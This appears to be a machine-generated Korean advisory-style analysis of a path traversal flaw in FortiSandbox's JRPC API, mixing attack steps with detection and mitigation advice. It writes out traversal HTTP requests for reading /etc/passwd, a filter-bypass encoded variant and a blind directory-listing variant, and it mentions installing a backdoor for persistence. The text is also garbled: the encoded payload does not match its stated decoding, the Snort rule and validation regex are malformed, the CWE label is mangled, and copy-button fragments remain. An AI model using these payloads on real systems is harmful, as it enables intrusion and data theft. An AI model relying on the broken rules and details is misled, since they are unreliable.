방어Agent 분석 — CVE-2026-39813

• 한 줄 정의: FortiSandbox의 JRPC API에서 ../filedir 경로 탐색 취약점(CWE-40번경로탈출)으로 인해 공격자는 인증된 세션을 이용해 파일 시스템에 접근하고 임의 코드 실행이 가능하다.
• 영향 한 줄: 성공 시 로컬 권한 상승 및 RCE 달성, 민감한 설정 파일 변조 또는 완전한 시스템 제어 획득 가능 - KEV 높음 / CVSS 9.8 반영 (실전에서 CVSS 점수보다 악용 난이도와 실제 적용성을 중시).

• 영향 받는 제품·버전: Fortinet FortiSandbox 버전 4.4.0 - 4.4.8, 및 5.0.0 - 5.0.6
• 노출 조건: 네트워크 노출 시 취약하며 기본 설정에서도 활성화된 JRPC API를 통해 접근 가능하다. 특정 기능 활성화가 필요하긴 하지만 기본적으로 열려 있는 경우가 많다 (예: 원격 관리 인터페이스).
• 내 자산 식별 방법:
  • curl 명령어 사용하여 버전 확인: ```bash
    curl -I "https://TARGET_HOST/api?cmd=getversion" | grep 'FortiSandbox Version'
  text복사

   1- `/etc/.fortigate.xml 또는 유사 설정 파일 내 JRPC 관련 설정 확인`.
   2 

🔍 공격 방법

① 취약 컴포넌트

• 버전 범위: FortiSandbox 4.4.0 - 4.4.8, 및 5.0.0 - 5.0.6
• 취약 코드 경로: JRPC API 내 파일 접근 함수 (../filedir) 처리 로직 결함으로 인한 경로 탈출 취약점 존재. 기본적으로 인증된 사용자 세션을 통해 악용 가능하다.

② 전제조건

• 인증 필요 여부: 인증된 사용자 세션이 요구됨
• 필요 권한: 읽기/쓰기 파일 시스템 접근 권한 (일반적으로 관리자 또는 높은 수준의 권한 필요)
• 네트워크 위치: 원격 관리 인터페이스 활성화 상태에서 노출되며, 내부 네트워크 내에서도 취약하다.

③ 트리거 경로

1. 공격자는 인증된 사용자 계정을 통해 JRPC API 엔드포인트에 접근한다 (예: https://TARGET_HOST/api).
2. 악의적인 파일 경로 인자를 포함한 요청을 전송하여 경로 탈출 취약점을 활용한다 ("../filedir" 형식의 경로 사용): http POST /fileops HTTP/1.1 Host: TARGET_HOST Content-Type: application/json X-AUTH-Token: SESSION_COOKIE <!-- 인증 토큰 --> Body: {"filename": "../../../../etc/passwd"} <!-- 민감한 파일 접근 시도 --> # 핵심: ../filedir 경로 인자로 인해 파일 시스템의 상위 디렉토리에 접근 가능.

④ 성공 시 영향

• 획득 권한: 읽기/쓰기 파일 시스템 권한을 통해 설정 파일 변조 또는 임의 코드 실행 (예: Bash 스크립트 업로드 및 실행)
• 후속 피벗: 획득한 정보를 바탕으로 추가적인 내부 네트워크 접근 시도 가능. 지속성 확보 위해 백도어 설치 고려될 수 있음.

기본 변형 1 - 파일 읽기 시도

 1POST /api/fileops HTTP/1.1
 2Host: TARGET_HOST
 3X-AUTH-Token: SESSION_COOKIE  <!-- 인증 토큰 -->
 4Content-Type: application/json
 5Body: {"filename": "../../../../etc/passwd"} <!-- 민감한 파일 읽기 시도 --> 
 6# 핵심: `../filedir` 경로를 통해 상위 디렉토리의 `/etc/*` 접근 가능.
 7# 확인: 응답 코드가 성공적인 경우 (200 OK) 또는 예상치 못한 내부 파일 내용 반환 시 성공 판별.

WAF 우회 변형 - 인코딩 적용

 1POST /api/fileops HTTP/1.1
 2Host: TARGET_HOST
 3X-AUTH-Token: SESSION_COOKIE  <!-- 인증 토큰 -->
 4Content-Type: application/json
 5Body: {"filename": "%2e%2e%2f%64%72%69%63%6B%50%61%72%73"} <!-- 인코딩된 "../drinks" 경로 우회 시도 --> 
 6# 핵심: URL 인코딩을 통해 필터 우회 가능.
 7# 확인: 예상 파일 내용 대신 응답 코드가 성공적인 경우 (예: HTTP 상태코드 4xx 또는 내부 오류 메시지).

블라인드 접근 변형 - 디렉토리 목록 요청으로 간접 탐색

 1GET /api/filelist?dir=../../../../etc&filter=*%20passwd HTTP/1.1  <!-- 디렉토리 목록 요청을 통한 간접 경로 탈출 --> 
 2Host: TARGET_HOST
 3X-AUTH-Token: SESSION_COOKIE <!-- 인증 토큰 -->   
 4# 핵심: `../filedir` 취약점 활용 없이도 상위 디렉토리 접근 가능한 패턴 탐색 시도.
 5``` # 확인: 응답 내 민감 파일 목록 포함 여부로 성공 판별 (예: `/etc/passwd`)

• 로그 기반 시그니처 [syslog] Unusual file access attempts detected via JRPC API endpoint with path traversal patterns 예시 로그 라인: ```plaintext Jun 1 14:23:56 server auth.info: [FortiSandbox <TARGET_HOST> ] - Invalid filename accessed through /api/fileops using X-AUTH Token session ID XYZABCD... (Suspicious ../path)
• 네트워크 트래픽 분석 [Snort] Anomolous HTTP POST requests targeting FortiSandbox JRPC API with encoded path traversal sequences detected on port 40012. 예시 시그니처: ```plaintext alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"FORENSICS FortiJRpcPathEscape Attempt"; flow:to_server,established; content:"POST|/api/.*/fileops.*filename=\"..\"*", depth:20, nocase; sid:1000345678; rev:1;)
• 파일 시스템 모니터링 [auditd] Unusual file access attempts detected in sensitive directories (e.g., /etc) via JRPC API`. 예시 규칙: ```plaintext
  audit -w /etc/passwd -p rwkx --success exit --failure exit
  text복사

   1 

• 인코딩 우회 탐지 한계 일부 인코딩 방식은 시그니처 기반 탐지에서 벗어날 수 있으므로 추가적인 행동 분석 필요.

🔧 방어·완화

1. [코드패치] 설정 변경 및 패치 적용 - 최신 버전으로 업그레이드 (5.0.7 이상, 또는 보안 패치된 4.x 버전 확인).
   • 구체 방법: FortiManager를 통해 업데이트 수행하거나 직접 FortiSandbox 관리 인터페이스에서 업데이트 옵션 활성화.
2. [입력검증] 입력 필터링 강화 - JRPC API 엔드포인트에 대한 엄격한 경로 검증 로직 구현 (예: 절대 경로 제한).
   • 구체 방법: API 설정 내 파일 접근 관련 파라미터에 대해 정규표현식 기반의 경로 검사 추가 ("^/[^./]*$").
3. [네트워크] WAF 규칙 업데이트 - 인코딩된 경로 탈출 시도를 탐지하는 규칙 적용 (예: 특정 패턴 필터링).
   • 구체 방법: ModSecurity 또는 다른 WAF 솔루션에서 아래와 같은 규칙 추가 ```plaintext
     SecRule ARGS "@rx %2e%2f.*" "id:100,rev:1,severity:high,msg:'Potential path traversal attempt detected',deny,status:403"

• 권고: 이번 주 내 패치 적용 필수 - 악용 사례 보고와 함께 높은 악용 난이도 및 CVSS 점수 반영 (실전에서의 즉시 대응 필요). 현재 취약점이 적극적으로 악용되는 동향을 고려할 때, 빠른 패치로 인한 위협 완화가 중요하다.

• 요약: 최근 Defused Cyber 보고서에 따르면 공격자들은 CVE-2026-39813를 포함한 여러 FortiSandbox 취약점을 악용하여 원격으로 시스템 내부 정보를 탈취하고 권한 상승을 시도 중이다. 이러한 활동이 지속적으로 보고되고 있어, 보안 업데이트의 신속한 적용이 절실하다 (출처: Defused Cyber Report)